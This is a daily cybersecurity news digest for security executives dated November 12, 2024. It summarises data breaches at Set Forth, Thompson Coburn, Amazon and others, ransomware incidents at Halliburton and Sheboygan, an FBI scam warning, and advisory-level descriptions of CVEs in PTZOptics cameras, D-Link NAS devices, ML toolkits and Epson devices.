CISO Daily Update - November 12, 2024
NEW DEVELOPMENTS
Massive Data Breach: American Debt Relief Service Exposes 1.5 Million
Source: Cybernews
A massive data breach at debt relief services provider Set Forth, Inc. exposed the personal information of 1.5 million people–including social security numbers, addresses, and dates of birth. The breach affected direct customers and business partners like Centrex, Inc., and was discovered in May 2024; Set Forth disclosed details to the Maine Attorney General on November 8. The company has implemented enhanced security protocols, including endpoint monitoring and a forced a global password reset. Set Forth offers the impacted users 12 months of identity theft protection and advises vigilance. At least two law firms are investigating potential class action suits on behalf of affected individuals.
Law Firm Data Breach Impacts 300,000 Presbyterian Healthcare Patients
Source: Security Week
A data breach at law firm Thompson Coburn compromised the personal information of over 300,000 patients of Presbyterian Healthcare Services. Discovered on May 29, 2024, the breach involved unauthorized access to files containing sensitive data, including names, social security numbers, dates of birth, medical record numbers, patient account numbers, prescription or treatment details, medical provider information, clinical data, and health insurance information. Thompson Coburn has notified affected individuals and offers free credit monitoring and identity theft protection services. The firm has not disclosed details about the cyberattack, and no known ransomware group has claimed responsibility.?
City of Sheboygan Hit by Cyberattack – Here’s the Latest on the Ransom Threat
Source: The Cyber Express
The City of Sheboygan, Wisconsin, recently suffered a ransomware attack that disrupted municipal services and compromised sensitive data. The cybercriminals demanded a ransom to restore access to the encrypted files. In response, city officials collaborated with cybersecurity experts and law enforcement agencies to assess the breach's impact and implement recovery measures. The city has not disclosed whether it intends to pay the ransom. Residents are advised to monitor official communications for updates and remain vigilant against potential scams exploiting the situation.?
Halliburton Reports $35 Million Loss After Ransomware Attack
Source: Bleeping Computer
In August 2024, Halliburton, a leading provider of products and services to the energy industry, suffered a ransomware attack attributed to the RansomHub group. The breach forced the company to shut down IT systems and disconnect customers, resulting in a $35 million loss. Despite the financial impact, Halliburton reported that the incident did not materially affect its financial performance. The company implemented enhanced cybersecurity measures to prevent future attacks.?
Amazon Discloses Employee Data Breach After May 2023 MOVEit Attacks
Source: Security Affairs
Amazon recently revealed a data breach affecting employee information from the May 2023 MOVEit attacks. The breach involved data stolen from a third-party vendor with 2.8 million records–allegedly leaked by the hacker Nam3L3ss on BreachForums. Compromised data such as names, contact details, building locations, and email addresses, while social security numbers and financial information remain unaffected. Amazon confirmed its systems were secured and only work contact information was exposed. While the MOVEit exploit is associated with the CL0P ransomware group, researchers are uncertain if CL0P or other actors orchestrated this breach.
SproutBeat Database Leak, Over 16,323 user records Exposed
Source: Cyber Press
The educational platform SproutBeat experienced a data breach that exposed the personal information of 16,323 users. The compromised data includes user IDs, names, and email addresses. A threat actor known as "888" has claimed responsibility for leaking this information on a dark web forum. Users are advised to change their passwords, enable two-factor authentication, and remain vigilant against potential phishing attacks.?
Threat Actor Allegedly Claims Leak of 489 Million Lines of Instagram Data
Source: Cyber Press
A threat actor claims to possess and is selling a dataset containing 489 million lines of Instagram user information. The alleged data includes usernames, email addresses, follower counts, and other personal details–reportedly obtained through data scraping techniques. Instagram users are advised to enhance their account security by updating passwords and enabling two-factor authentication.
Notorious 888 Allegedly Claim Leak of Appleton Harley-Davidson
Source: Cyber Press
The cybercriminal group "888" has reportedly leaked sensitive data from Appleton Harley-Davidson, compromising the personal information of nearly 20,000 customers including names and email addresses. The breach was first reported on November 10, 2024. Appleton Harley-Davidson has not released an official statement or confirmed an ongoing investigation.
FBI Issues Warning as Crooks Ramp Up Emergency Data Request Scams
Source: The Register
The FBI warned of a surge in fraudulent emergency data requests (EDRs) targeting U.S. businesses and law enforcement agencies. Cybercriminals exploit compromised government email accounts to send fake EDRs, tricking organizations into disclosing sensitive personal information without proper verification. This tactic has gained popularity, with underground forums offering tutorials on executing such scams for as little as $100. The FBI advises organizations to strengthen relationships with local FBI field offices and review incident response plans to mitigate these threats.?
VULNERABILITIES TO WATCH
CISA Warns of Critical Vulnerabilities in Industrial Control Systems Affecting Key Infrastructure Sectors
Source: The Cyber Express
The Cybersecurity and Infrastructure Security Agency (CISA) added two critical vulnerabilities, CVE-2024-8957 and CVE-2024-8956, to its Known Exploited Vulnerabilities Catalog. These vulnerabilities affect PTZOptics PT30X-SDI/NDI cameras running firmware versions earlier than 6.3.40. CVE-2024-8957 is an OS command injection flaw that allows remote, authenticated attackers to escalate privileges to root by injecting crafted payloads into the ntp_addr parameter of the /cgi-bin/param.cgi script. CVE-2024-8956 is an authentication bypass issue enabling unauthorized access to sensitive camera functions by exploiting insecure direct object references. CISA urges users to update to firmware version 6.3.40 or discontinue use if updates are unavailable. The deadline is set for November 25, 2024.?
Many Legacy D-Link NAS Devices Exposed to Remote Attacks via Critical Flaw
Source: Security Week
D-Link issued a warning regarding a critical command injection vulnerability. The CVE-2024-10914 affects multiple discontinued network-attached storage (NAS) models. This flaw allows unauthenticated attackers to execute arbitrary shell commands by exploiting improper input sanitization in the account management function. The vulnerability impacts models including DNS-320, DNS-320LW, DNS-325, and DNS-340L. These devices have reached their end-of-life status and will not receive security updates. D-Link advises users to retire the affected products and upgrade to supported models to maintain network security.?
Security Flaws in Popular ML Toolkits Enable Server Hijacks, Privilege Escalation
Source: The Hacker News
Researchers recently uncovered nearly two dozen security vulnerabilities in 15 widely used open-source machine learning (ML) projects, such as Weave, ZenML, Deep Lake, Vanna AI, and Mage AI. JFrog, a software supply chain security firm, identified these flaws, which allow attackers to hijack servers, escalate privileges, and compromise ML pipelines. Key vulnerabilities include CVE-2024-7340, a directory traversal flaw in Weave that permits unauthorized file access; an access control weakness in ZenML that enables privilege escalation; and CVE-2024-6507, a command injection issue in Deep Lake that facilitates system command execution.
Epson Devices Vulnerability Let Attackers Create Rogue Admin Accounts
Source: Cyber Security News
A critical vulnerability (CVE-2024-47295) has been found in various Epson devices, including printers, scanners, and network interface products. This flaw allows attackers to exploit an unsecured, blank administrator password to create unauthorized admin accounts through the Web Config interface–potentially gaining full control over the device. Epson urges users to mitigate these risks by setting strong administrator passwords, using firewalls, and keeping firmware up to date.
SPECIAL REPORTS
How Human Ingenuity Continues to Outpace Automated Security Tools
Source: Help Net Security
A recent HackerOne report reveals that 10% of security researchers now specialize in AI technology, with 48% of security leaders identifying AI as a significant risk to their organizations. The report highlights a 171% increase in AI assets on the HackerOne platform, noting that 55% of reported AI vulnerabilities pertain to safety issues. Despite the rise in AI-related vulnerabilities, bounties for these reports average $401 compared to $689 for traditional security programs. The report emphasizes integrating human expertise with technology to effectively address the unique challenges posed by AI and emerging technologies.?
Finding value in this newsletter? Like or share this post on LinkedIn